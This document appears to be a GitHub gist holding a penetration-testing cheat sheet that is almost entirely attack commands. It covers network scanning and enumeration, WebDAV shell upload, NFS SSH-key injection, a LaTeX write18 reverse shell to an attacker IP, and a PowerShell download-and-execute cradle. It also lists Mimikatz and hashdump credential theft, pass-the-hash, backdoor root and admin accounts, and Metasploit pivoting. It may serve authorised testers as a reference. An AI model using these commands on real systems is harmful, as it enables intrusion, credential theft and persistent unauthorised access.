Created
December 30, 2022 11:09
-
-
Save Mehedi-Babu/9880e4360b6385036444e9aa7005f9a2 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## Reminders | |
| **Remember to log all the things!** | |
| * Metasploit - spool /home/<username>/.msf3/logs/console.log | |
| * Save contents from each terminal! | |
| * Linux - script myoutput.txt # Type exit to stop | |
| ## Setup | |
| ```bash | |
| # Disable network-manager | |
| $ service network-manager stop | |
| # Set IP address | |
| $ ifconfig eth0 192.168.50.12/24 | |
| # Set default gateway | |
| route add default gw 192.168.50.9 | |
| # Set DNS servers | |
| $ echo "nameserver 192.168.100.2" >> /etc/resolv.conf | |
| # Show routing table | |
| C:\> route print # Windows | |
| $ route -n # Linux | |
| # Add static route | |
| C:\> route add 0.0.0.0 mask 0.0.0.0 192.168.50.9 # Windows | |
| $ route add -net 192.168.100.0/24 gw 192.16.50.9 # Linux | |
| # Subnetting easy mode | |
| $ ipcalc 192.168.0.1 255.255.255.0 | |
| # Windows SAM file locations | |
| C:\> dir c:\windows\system32\config\ | |
| C:\> dir c:\windows\repair\ | |
| C:\> bkhive system /root/hive.txt | |
| C:\> samdump2 SAM /root/hive.txt > /root/hash.txt | |
| # Python Shell | |
| $ python -c 'import pty;pty.spawn("/bin/bash")' | |
| ``` | |
| ## Internet Host/Network Enumeration | |
| ```bash | |
| # WHOIS Querying | |
| $ whois www.domain.com | |
| # Resolve an IP using DIG | |
| $ dig @8.8.8.8 securitymuppets.com | |
| # Find Mail servers for a domain | |
| $ dig @8.8.8.8 securitymuppets.com -t mx | |
| # Find any DNS records for a domain | |
| $ dig @8.8.8.8 securitymuppets.com -t any | |
| # Zone Transfer | |
| $ dig @192.168.100.2 securitymuppets.com -t axfr | |
| $ host -l securitymuppets.com 192.168.100.2 | |
| $ nslookup / ls -d domain.com.local | |
| # Fierce | |
| $ fierce -dns <domain> -file <output_file> | |
| $ fierce -dns <domain> -dnsserver <server> | |
| $ fierce -range <ip-range> -dnsserver <server> | |
| $ fierce -dns <domain> -wordlist <wordlist> | |
| ``` | |
| ## IP Network scanning | |
| ```bash | |
| # ARP Scan | |
| $ arp-scan 192.168.50.8/28 -I eth0 | |
| ``` | |
| ### NMAP Scans | |
| ```bash | |
| # Nmap ping scan | |
| $ sudo nmap –sn -oA nmap_pingscan 192.168.100.0/24 (-PE) | |
| # Nmap SYN/Top 100 ports Scan | |
| $ nmap -sS -F -oA nmap_fastscan 192.168.0.1/24 | |
| # Nmap SYN/Version All port Scan - ## Main Scan | |
| $ sudo nmap -sV -PN -p0- -T4 -A --stats-every 60s --reason -oA nmap_scan 192.168.0.1/24 | |
| # Nmap SYN/Version No Ping All port Scan | |
| $ sudo nmap -sV -Pn -p0- --exclude 192.168.0.1 --reason -oA nmap_scan 192.168.0.1/24 | |
| # Nmap UDP All port scan - ## Main Scan | |
| $ sudo nmap -sU -p0- --reason --stats-every 60s --max-rtt-timeout=50ms --max-retries=1 -oA nmap_scan 192.168.0.1/24 | |
| # Nmap UDP/Fast Scan | |
| $ nmap -F -sU -oA nmap_UDPscan 192.168.0.1/24 | |
| # Nmap Top 1000 port UDP Scan | |
| $ nmap -sU -oA nmap_UDPscan 192.168.0.1/24 | |
| # Nmap enumerate SSL ciphers on remote host/port | |
| $ nmap -Pn -p 5986 --script=ssl-enum-ciphers <TARGET> | |
| # HPING3 Scans | |
| $ hping3 -c 3 -s 53 -p 80 -S 192.168.0.1 | |
| # Open = flags = SA | |
| # Closed = Flags = RA | |
| # Blocked = ICMP unreachable | |
| # Dropped = No response | |
| # Source port scanning | |
| $ nmap -g <port> (88 (Kerberos) port 53 (DNS) or 67 (DHCP)) | |
| # Source port also doesn't work for OS detection. | |
| # Speed settings: | |
| # -n Disable DNS resolution | |
| # -sS TCP SYN (Stealth) Scan | |
| # -Pn Disable host discovery | |
| # -T5 Insane time template | |
| # --min-rate 1000 1000 packets per second | |
| # --max-retries 0 Disable retransmission of timed-out probes | |
| ``` | |
| ## Cisco/Networking Commands | |
| ```bash | |
| ? - Help | |
| > - User mode | |
| # - Privileged mode | |
| router(config)# - Global Configuration mode | |
| ``` | |
| enable secret more secure than enable password. | |
| For example, in the configuration command: | |
| enable secret 5 $1$iUjJ$cDZ03KKGh7mHfX2RSbDqP. | |
| The enable secret has been hashed with MD5, whereas in the command: | |
| username jdoe password 7 07362E590E1B1C041B1E124C0A2F2E206832752E1A01134D | |
| The password has been encrypted using the weak reversible algorithm. | |
| ```bash | |
| # Change to privileged mode to view configs | |
| cisco> enable | |
| # Change to global config mode to modify | |
| cisco# config terminal/config t | |
| # Gives you the router's configuration register (Firmware) | |
| cisco# show version | |
| # Shows the router, switch, or firewall's current configuration | |
| cisco# show running-config | |
| # show the router's routing table | |
| cisco# show ip route | |
| # Dump config but obscure passwords | |
| cisco# show tech-support | |
| ``` | |
| ## Remote Information Services | |
| ### DNS | |
| ```bash | |
| # Zone Transfer | |
| $ host -l securitymuppets.com 192.168.100.2 | |
| # Metasploit Auxiliarys: | |
| metasploit> use auxiliary/gather/dns... | |
| ``` | |
| ### Finger - Enumerate Users | |
| ```bash | |
| $ finger @192.168.0.1 | |
| $ finger -l -p user@ip-address | |
| metasploit> use auxiliary/scanner/finger/finger_users | |
| ``` | |
| ### NTP | |
| ```bash | |
| # Use Metasploit Auxiliarys | |
| metasploit> use ... | |
| ``` | |
| ### SNMP | |
| ```bash | |
| # Use onsixtyone tool and a dictionary | |
| $ onesixtyone -c /usr/share/doc/onesixtyone/dict.txt | |
| # Use metasploit SNP module | |
| metasploit> ?? # Use Metasploit Module snmp_enum | |
| # Use snmpcheck | |
| $ snmpcheck -t snmpservice | |
| ``` | |
| ### rservices | |
| ```bash | |
| $ rwho 192.168.0.1 | |
| $ rlogin -l root 192.168.0.17 | |
| ``` | |
| ### RPC Services | |
| ```bash | |
| $ rpcinfo -p | |
| metasploit> ?? # Use Endpoint_mapper module | |
| ``` | |
| ## Web Services | |
| ### WebDAV | |
| Metasploit Auxiliarys | |
| 1) Upload shell to Vulnerable WebDAV directory: | |
| ``` | |
| $ msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.20 LPORT=4444 R | msfencode -t asp -o shell.asp | |
| ``` | |
| 1) Run cadaver? | |
| ``` | |
| $ cadaver http://192.168.0.60/ | |
| ``` | |
| 1) ??? | |
| ``` | |
| $ put shell.asp shell.txt | |
| ``` | |
| 1) ??? | |
| ```bash | |
| $ copy shell.txt shell.asp;.txt | |
| ``` | |
| 1) Start reverse handler | |
| ```bash | |
| ??? | |
| ``` | |
| 1) Browse to `http://192.168.0.60/shell.asp;.txt` | |
| ## Windows Networking Services | |
| Get Domain Information: | |
| ``` | |
| C:\> nltest /DCLIST:DomainName | |
| C:\> nltest /DCNAME:DomainName | |
| C:\> nltest /DSGETDC:DomainName | |
| ``` | |
| Netbios Enumeration | |
| ```bash | |
| C:\> nbtscan -r 192.168.0.1-100 | |
| C:\> nbtscan -f hostfiles.txt | |
| ``` | |
| enum4linux | |
| ```bash | |
| $ enum4linux ??? | |
| ``` | |
| RID Cycling | |
| ```bash | |
| meterpreter> use auxiliary/scanner/smb/smb_lookupsid | |
| ``` | |
| # Null Session in Windows | |
| ```bash | |
| C:\ net use \\192.168.0.1\IPC$ "" /u:"" | |
| ``` | |
| # Null Session in Linux | |
| ```bash | |
| $ smbclient -L //192.168.99.131 | |
| ``` | |
| ## Accessing Email Services | |
| ### Metasploit Auxiliarys | |
| SMTP Open Relay Commands | |
| ```bash | |
| $ ncat -C 86.54.23.178 25 | |
| > HELO mail.co.uk | |
| > MAIL FROM: <Attacker@mail.co.uk> | |
| > RCPT TO: <Victim@email.com> | |
| > DATA | |
| ``` | |
| ## VPN Testing | |
| ike-scan | |
| ```bash | |
| $ ike-scan 192.168.207.134 | |
| $ sudo ike-scan -A 192.168.207.134 | |
| $ sudo ike-scan -A 192.168.207.134 --id=myid -P192-168-207-134key | |
| ``` | |
| pskcrack | |
| ```bash | |
| $ psk-crack -b 5 192-168-207-134key | |
| $ psk-crack -b 5 --charset="01233456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" 192-168-207-134key | |
| $ psk-crack -d /path/to/dictionary 192-168-207-134key | |
| ``` | |
| ## Unix RPC | |
| ### NFS Mounts | |
| ```bash | |
| meterpreter> use auxiliary/scanner/nfs/nfsmount | |
| ``` | |
| ```bash | |
| $ rpcinfo -p 192.168.0.10 | |
| ``` | |
| ```bash | |
| $ showmount -e 192.168.0.10 | |
| $ mount 192.168.0.10:/secret /mnt/share/ | |
| ``` | |
| ```bash | |
| $ ssh-keygen | |
| $ mkdir /tmp/r00t | |
| $ mount -t nfs 192.168.0.10:/secret /mnt/share/ | |
| $ cat ~/.ssh/id_rsa.pub >> /mnt/share/root/.ssh/authorized_keys | |
| $ umount /mnt/share | |
| $ ssh root@192.168.0.10 | |
| ``` | |
| ## Misc | |
| ### LaTeX | |
| 1) Setup a netcat listener on Kali | |
| ``` | |
| kali$ nc -nlvp 31337 | |
| ``` | |
| 2) Use Burp or Postman to capture and repeat POST | |
| 3) Modify payload to post following content | |
| ``` | |
| \immediate\write18{bash+-c+'bash+-i+>%26+/dev/tcp/KALI_IP/31337+0>%261'} | |
| ``` | |
| Notice that the content is URL encoded! Also, the `KALI_IP` is often times a VPN IP, like on the tun0 interface. Basically it shold be the interface/IP that the remote machine has access to reach. | |
| ## Post Exploitation | |
| Command prompt access on Windows Host | |
| ```bash | |
| pth-winexe -U Administrator%<hash> //<host ip> cmd.exe | |
| ``` | |
| Add Linux User | |
| ```bash | |
| /usr/sbin/useradd –g 0 –u 0 –o user | |
| echo user:password | /usr/sbin/chpasswd | |
| ``` | |
| Add Windows User | |
| ``` | |
| net user username password@1 /add | |
| net localgroup administrators username /add | |
| ``` | |
| Solaris Commands | |
| ```bash | |
| useradd -o user | |
| passwd user | |
| usermod -R root user | |
| ``` | |
| Dump remote SAM: | |
| ```bash | |
| PwDump.exe -u localadmin 192.168.0.1 | |
| ``` | |
| Mimikatz | |
| ```bash | |
| mimikatz # privilege::debug | |
| mimikatz # sekurlsa::logonPasswords full | |
| ``` | |
| Meterpreter | |
| ```bash | |
| meterpreter> run winenum | |
| meterpreter> use post/windows/gather/smart_hashdump | |
| meterpreter > use incognito | |
| meterpreter > list_tokens -u | |
| meterpreter > impersonate_token TVM\domainadmin | |
| meterpreter > add_user hacker password1 -h 192.168.0.10 | |
| meterpreter > add_group_user "Domain Admins" hacker -h 192.168.0.10 | |
| meterpreter > load mimikatz | |
| meterpreter > wdigest | |
| meterpreter > getWdigestPasswords | |
| Migrate if does not work! | |
| ``` | |
| Kitrap0d | |
| ```bash | |
| Download vdmallowed.exe and vdmexploit.dll to victim | |
| Run vdmallowed.exe to execute system shell | |
| ``` | |
| # Windows Information | |
| ```bash | |
| On Windows: | |
| ipconfig /all | |
| systeminfo | |
| net localgroup administrators | |
| net view | |
| net view /domain | |
| ``` | |
| # SSH Tunnelling | |
| ```bash | |
| Remote forward port 222 | |
| ssh -R 127.0.0.1:4444:10.1.1.251:222 -p 443 root@192.168.10.118 | |
| ``` | |
| ## Metasploit | |
| ### Metasploit Pivot | |
| Compromise 1st machine | |
| ``` | |
| meterpreter> run arp_scanner -r 10.10.10.0/24 | |
| meterpreter> route add 10.10.10.10 255.255.255.248 <session> | |
| meterpreter> use auxiliary/scanner/portscan/tcp | |
| msf auxiliary(tcp)> use bind shell | |
| ``` | |
| or run autoroute: | |
| ```bash | |
| meterpreter> ipconfig | |
| meterpreter> run autoroute -s 10.1.13.0/24 | |
| meterpreter> getsystem | |
| meterpreter> run hashdump | |
| meterpreter> use auxiliary/scanner/portscan/tcp | |
| msf auxiliary(tcp)> use exploit/windows/smb/psexec | |
| ``` | |
| or port forwarding: | |
| ``` | |
| meterpreter> run autoroute -s 10.1.13.0/24 | |
| meterpreter> use auxiliary/scanner/portscan/tcp | |
| msf auxiliary(tcp)> portfwd add -l <listening port> -p <remote port> -r <remote/internal host> | |
| ``` | |
| or socks proxy: | |
| ``` | |
| meterpreter> route add 10.10.10.10 255.255.255.248 <session> | |
| meterpreter> use auxiliary/server/socks4a | |
| # Add proxy to /etc/proxychains.conf | |
| msf auxiliary(tcp)> proxychains nmap -sT -T4 -Pn 10.10.10.50 | |
| msf auxiliary(tcp)> setg socks4:127.0.0.1:1080 | |
| ``` | |
| ## Pass the hash | |
| If NTML only: | |
| ```bash | |
| 00000000000000000000000000000000:8846f7eaee8fb117ad06bdd830b7586c | |
| STATUS_ACCESS_DENIED (Command=117 WordCount=0): | |
| ``` | |
| This can be remedied by navigating to the registry key, `"HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanManServer\Parameters"` on the target systems and setting the value of `"RequireSecuritySignature"` to `"0"` | |
| ``` | |
| # Run hashdump on the first compromised machine: | |
| meterpreter> run post/windows/gather/hashdump | |
| # Run Psexec module and specify the hash: | |
| meterpreter> use exploit/windows/smb/psexec | |
| ``` | |
| ## Enable RDP: | |
| ```bash | |
| meterpreter> run getgui -u hacker -p s3cr3t | |
| # Clean up command: | |
| meterpreter> run multi_console_command \ | |
| -rc /root/.msf3/logs/scripts/getgui/clean_up__20110112.2448.rc | |
| ``` | |
| ## AutoRunScript | |
| 1) Automatically run scripts before exploiation: | |
| ```bash | |
| set AutoRunScript "migrate explorer.exe" | |
| ``` | |
| 1) Set up SOCKS proxy in MSF | |
| 1) Run a post module against all sessions | |
| ```bash | |
| $ resource /usr/share/metasploit-framework/scripts/resource/run_all_post.rc | |
| ``` | |
| 1) Find local subnets 'Whilst in meterpreter shell' | |
| ```bash | |
| meterpreter> run get_local_subnets | |
| ``` | |
| 1) Add the correct Local host and Local port parameters | |
| ```bash | |
| $ echo "Invoke-Shellcode -Payload windows/meterpreter/reverse_https \ | |
| -Lhost 192.168.0.7 \ | |
| -Lport 443 \ | |
| -Force" \ | |
| >> /var/www/payload | |
| ``` | |
| 1) Set up psexec module on metasploit | |
| ```bash | |
| metasploit> use auxiliary/admin/smb/psexec_command | |
| metasploit> set command powershell \ | |
| -Exec Bypass \ | |
| -NoL \ | |
| -NoProfile \ | |
| -Command IEX (New-Object Net.WebClient).DownloadString(\'http://192.168.0.9/payload\') | |
| ``` | |
| 1) Start reverse Handler to catch the reverse connection | |
| Module options (exploit/multi/handler): | |
| Payload options (windows/meterpreter/reverse_https): | |
| ```bash | |
| Name Current Setting Required Description | |
| ---- --------------- -------- ----------- | |
| EXITFUNC process yes Exit technique: seh, thread, process, none | |
| LHOST 192.168.0.9 yes The local listener hostname | |
| LPORT 443 yes The local listener port | |
| ``` | |
| 1) Show evasion module options | |
| ```bash | |
| metasploit> show evasion | |
| ``` | |
| ### Metasploit Shellcode | |
| ``` | |
| $ msfvenom -p windows/shell_bind_tcp -b '\x00\x0a\x0d' | |
| ``` | |
| ## File Transfer Services | |
| Start TFTPD Server | |
| ```bash | |
| $ atftpd --daemon --port 69 /tmp | |
| ``` | |
| Connect to TFTP Server | |
| ```bash | |
| $ tftp 192.168.0.10 | |
| tftp> put / get files | |
| ``` | |
| ## LDAP Querying | |
| Tools: | |
| ldapsearch | |
| LDAPExplorertool2 | |
| Anonymous Bind: | |
| ldapsearch -h ldaphostname -p 389 -x -b "dc=domain,dc=com" | |
| Authenticated: | |
| ldapsearch -h 192.168.0.60 -p 389 -x -D "CN=Administrator, CN=User, DC=<domain>, DC=com" -b "DC=<domain>, DC=com" -W | |
| Useful Links: | |
| http://www.lanmaster53.com/2013/05/public-facing-ldap-enumeration/ | |
| http://blogs.splunk.com/2009/07/30/ldapsearch-is-your-friend/ | |
| ## Password Attacks | |
| ``` | |
| # Bruteforcing http password prompts | |
| medusa -h <ip/host> \ | |
| -u <user> \ | |
| -P <password list> \ | |
| -M http \ | |
| -n <port> \ | |
| -m DIR:/<directory> \ | |
| -T 30 | |
| ``` |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment